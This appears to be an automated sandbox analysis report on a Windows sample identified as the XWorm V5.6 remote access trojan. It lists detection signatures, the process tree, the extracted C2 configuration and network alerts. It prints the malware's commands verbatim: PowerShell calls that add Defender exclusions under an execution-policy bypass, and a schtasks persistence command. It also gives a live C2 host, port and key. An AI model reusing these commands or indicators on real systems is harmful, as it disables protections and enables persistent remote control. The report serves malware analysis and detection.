Windows Analysis Report
72OWK7wBVH.exe

Overview

General Information

Sample name: 72OWK7wBVH.exe (renamed because original name is a hash value)
Original sample name: e58e3513066ca537d090cdfae72904220a90ba3b081bbd9d49318e27788c5729.exe
Analysis ID: 1575210
MD5: 0860112f7bd00567371faffe18061cab
SHA1: 84a59bd00070c7bfeb141a2c745c31a6451f7db9
SHA256: e58e3513066ca537d090cdfae72904220a90ba3b081bbd9d49318e27788c5729
Tags: exe, user-Chainskilabs

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 72OWK7wBVH.exe (PID: 6776 cmdline: "C:\Users\user\Desktop\72OWK7wBVH.exe" MD5: 0860112F7BD00567371FAFFE18061CAB)
    • powershell.exe (PID: 8 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '72OWK7wBVH.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SYSTEM' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2308 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • SYSTEM (PID: 5928 cmdline: C:\Users\user\AppData\Roaming\SYSTEM MD5: 0860112F7BD00567371FAFFE18061CAB)
  • SYSTEM (PID: 5480 cmdline: C:\Users\user\AppData\Roaming\SYSTEM MD5: 0860112F7BD00567371FAFFE18061CAB)
  • SYSTEM (PID: 4556 cmdline: C:\Users\user\AppData\Roaming\SYSTEM MD5: 0860112F7BD00567371FAFFE18061CAB)
  • cleanup

Malware Configuration

{"C2 url": ["if-sensors.gl.at.ply.gg"], "Port": 24891, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Source | Rule | Description | Author | Strings
72OWK7wBVH.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
72OWK7wBVH.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xffa6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x10043:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x10158:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xf77a:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Roaming\SYSTEM | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Roaming\SYSTEM | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xffa6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x10043:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x10158:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xf77a:$cnc4: POST / HTTP/1.1
00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xfda6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xfe43:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xff58:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xf57a:$cnc4: POST / HTTP/1.1
Process Memory Space: 72OWK7wBVH.exe PID: 6776 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0.0.72OWK7wBVH.exe.510000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0.0.72OWK7wBVH.exe.510000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xffa6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x10043:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x10158:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xf77a:$cnc4: POST / HTTP/1.1

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\72OWK7wBVH.exe", ParentImage: C:\Users\user\Desktop\72OWK7wBVH.exe, ParentProcessId: 6776, ParentProcessName: 72OWK7wBVH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', ProcessId: 8, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\72OWK7wBVH.exe", ParentImage: C:\Users\user\Desktop\72OWK7wBVH.exe, ParentProcessId: 6776, ParentProcessName: 72OWK7wBVH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', ProcessId: 8, ProcessName: powershell.exe
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\user\AppData\Roaming\SYSTEM, CommandLine: C:\Users\user\AppData\Roaming\SYSTEM, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\SYSTEM, NewProcessName: C:\Users\user\AppData\Roaming\SYSTEM, OriginalFileName: C:\Users\user\AppData\Roaming\SYSTEM, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\SYSTEM, ProcessId: 5928, ProcessName: SYSTEM
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\72OWK7wBVH.exe", ParentImage: C:\Users\user\Desktop\72OWK7wBVH.exe, ParentProcessId: 6776, ParentProcessName: 72OWK7wBVH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', ProcessId: 8, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\72OWK7wBVH.exe, ProcessId: 6776, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYSTEM.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\72OWK7wBVH.exe", ParentImage: C:\Users\user\Desktop\72OWK7wBVH.exe, ParentProcessId: 6776, ParentProcessName: 72OWK7wBVH.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM", ProcessId: 2308, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\72OWK7wBVH.exe", ParentImage: C:\Users\user\Desktop\72OWK7wBVH.exe, ParentProcessId: 6776, ParentProcessName: 72OWK7wBVH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe', ProcessId: 8, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-14T18:55:10.501670+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49737 | 147.185.221.24 | 24891 | TCP

AV Detection

Source: 72OWK7wBVH.exe | Avira: detected
Source: if-sensors.gl.at.ply.gg | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\SYSTEM | Avira: detection malicious, Label: TR/Spy.Gen
Source: 72OWK7wBVH.exe | Malware Configuration Extractor: Xworm {"C2 url": ["if-sensors.gl.at.ply.gg"], "Port": 24891, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\Users\user\AppData\Roaming\SYSTEM | ReversingLabs: Detection: 76%
Source: 72OWK7wBVH.exe | ReversingLabs: Detection: 76%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\SYSTEM | Joe Sandbox ML: detected
Source: 72OWK7wBVH.exe | Joe Sandbox ML: detected
Source: 72OWK7wBVH.exe | String decryptor: if-sensors.gl.at.ply.gg
Source: 72OWK7wBVH.exe | String decryptor: 24891
Source: 72OWK7wBVH.exe | String decryptor: <123456789>
Source: 72OWK7wBVH.exe | String decryptor: <Xwormmm>
Source: 72OWK7wBVH.exe | String decryptor: XWorm V5.6
Source: 72OWK7wBVH.exe | String decryptor: USB.exe
Source: 72OWK7wBVH.exe | String decryptor: %AppData%
Source: 72OWK7wBVH.exe | String decryptor: SYSTEM
Source: 72OWK7wBVH.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 72OWK7wBVH.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49737 -> 147.185.221.24:24891
Source: Malware configuration extractor | URLs: if-sensors.gl.at.ply.gg
Source: global traffic | TCP traffic: 147.185.221.24 ports 1,2,4,24891,8,9
Source: global traffic | TCP traffic: 192.168.2.4:49737 -> 147.185.221.24:24891
Source: Joe Sandbox View | IP Address: 147.185.221.24
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: if-sensors.gl.at.ply.gg
Source: powershell.exe, 00000001.00000002.1779023894.0000020ADC582000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2034970056.000002259C890000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000001.00000002.1770585947.0000020AD3FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1861905123.0000014DA0450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2015139866.000002259459F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1753519383.0000020AC41B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1809425310.0000014D90609000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919585212.000002258475A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 72OWK7wBVH.exe, 00000000.00000002.2942146763.0000000002861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1753519383.0000020AC3F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1809425310.0000014D903E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919585212.0000022584531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076758837.000001671FC01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1753519383.0000020AC41B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1809425310.0000014D90609000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919585212.000002258475A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000B.00000002.2226725098.00000167381D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000001.00000002.1779448718.0000020ADC753000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000001.00000002.1753519383.0000020AC3F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1809425310.0000014D903E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919585212.0000022584531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2076758837.000001671FC01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2076758837.000001671FE2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1770585947.0000020AD3FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1861905123.0000014DA0450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2015139866.000002259459F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2198651118.000001672FC6E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

Operating System Destruction

Source: C:\Users\user\Desktop\72OWK7wBVH.exe | Process information set: 01 00 00 00

            System Summary

            barindex
            Source: 72OWK7wBVH.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.0.72OWK7wBVH.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Roaming\SYSTEM, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeCode function: 0_2_00007FFD9B7F80160_2_00007FFD9B7F8016
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeCode function: 0_2_00007FFD9B7F11900_2_00007FFD9B7F1190
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeCode function: 0_2_00007FFD9B7F8DC20_2_00007FFD9B7F8DC2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8C2E111_2_00007FFD9B8C2E11
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 15_2_00007FFD9B7F0E7815_2_00007FFD9B7F0E78
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 15_2_00007FFD9B7F106815_2_00007FFD9B7F1068
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 15_2_00007FFD9B7F0FE215_2_00007FFD9B7F0FE2
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 15_2_00007FFD9B7F10D015_2_00007FFD9B7F10D0
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 16_2_00007FFD9B7E0E0016_2_00007FFD9B7E0E00
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 16_2_00007FFD9B7E106816_2_00007FFD9B7E1068
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 16_2_00007FFD9B7E0FE216_2_00007FFD9B7E0FE2
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 16_2_00007FFD9B7E10D016_2_00007FFD9B7E10D0
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 18_2_00007FFD9B7F0E7818_2_00007FFD9B7F0E78
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 18_2_00007FFD9B7F106818_2_00007FFD9B7F1068
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 18_2_00007FFD9B7F0FE218_2_00007FFD9B7F0FE2
            Source: C:\Users\user\AppData\Roaming\SYSTEMCode function: 18_2_00007FFD9B7F10D018_2_00007FFD9B7F10D0
            Source: 72OWK7wBVH.exe, 00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSPOOFER.exe4 vs 72OWK7wBVH.exe
            Source: 72OWK7wBVH.exeBinary or memory string: OriginalFilenameSPOOFER.exe4 vs 72OWK7wBVH.exe
            Source: 72OWK7wBVH.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 72OWK7wBVH.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.0.72OWK7wBVH.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Roaming\SYSTEM, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 72OWK7wBVH.exe, dqXaMwXLg9MVq7Wj6FfBk29TqWmWtjwSuyDhxf0gBQ5gCA4hbdpPrFLzrI4iByoionLlERsTJiYZ7voSGQagrEL99t7Mk.csCryptographic APIs: 'TransformFinalBlock'
            Source: 72OWK7wBVH.exe, dqXaMwXLg9MVq7Wj6FfBk29TqWmWtjwSuyDhxf0gBQ5gCA4hbdpPrFLzrI4iByoionLlERsTJiYZ7voSGQagrEL99t7Mk.csCryptographic APIs: 'TransformFinalBlock'
            Source: 72OWK7wBVH.exe, 3GqSiOnMczjgnrSizD1bqVUyz5ANfue2d6tIc52d6Q6kfRkXS7pQiPq5sulpXTR3XkYNBnSXSDUCkM7An4EQJVED6GVGo.csCryptographic APIs: 'TransformFinalBlock'
            Source: SYSTEM.0.dr, dqXaMwXLg9MVq7Wj6FfBk29TqWmWtjwSuyDhxf0gBQ5gCA4hbdpPrFLzrI4iByoionLlERsTJiYZ7voSGQagrEL99t7Mk.csCryptographic APIs: 'TransformFinalBlock'
            Source: SYSTEM.0.dr, dqXaMwXLg9MVq7Wj6FfBk29TqWmWtjwSuyDhxf0gBQ5gCA4hbdpPrFLzrI4iByoionLlERsTJiYZ7voSGQagrEL99t7Mk.csCryptographic APIs: 'TransformFinalBlock'
            Source: SYSTEM.0.dr, 3GqSiOnMczjgnrSizD1bqVUyz5ANfue2d6tIc52d6Q6kfRkXS7pQiPq5sulpXTR3XkYNBnSXSDUCkM7An4EQJVED6GVGo.csCryptographic APIs: 'TransformFinalBlock'
            Source: 72OWK7wBVH.exe, Ifdhep5ZECNCbsHRRrCfe9toeHkrAfH417PI4PxHARviDbB41U8jDZEo0iv9c.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 72OWK7wBVH.exe, Ifdhep5ZECNCbsHRRrCfe9toeHkrAfH417PI4PxHARviDbB41U8jDZEo0iv9c.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: SYSTEM.0.dr, Ifdhep5ZECNCbsHRRrCfe9toeHkrAfH417PI4PxHARviDbB41U8jDZEo0iv9c.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: SYSTEM.0.dr, Ifdhep5ZECNCbsHRRrCfe9toeHkrAfH417PI4PxHARviDbB41U8jDZEo0iv9c.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@19/21@1/1
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeFile created: C:\Users\user\AppData\Roaming\SYSTEMJump to behavior
            Source: C:\Users\user\AppData\Roaming\SYSTEMMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:824:120:WilError_03
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeMutant created: \Sessions\1\BaseNamedObjects\kIzRn1eiG3yt9dVz
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2668:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
            Source: C:\Users\user\Desktop\72OWK7wBVH.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
            Source: 72OWK7wBVH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 72OWK7wBVH.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
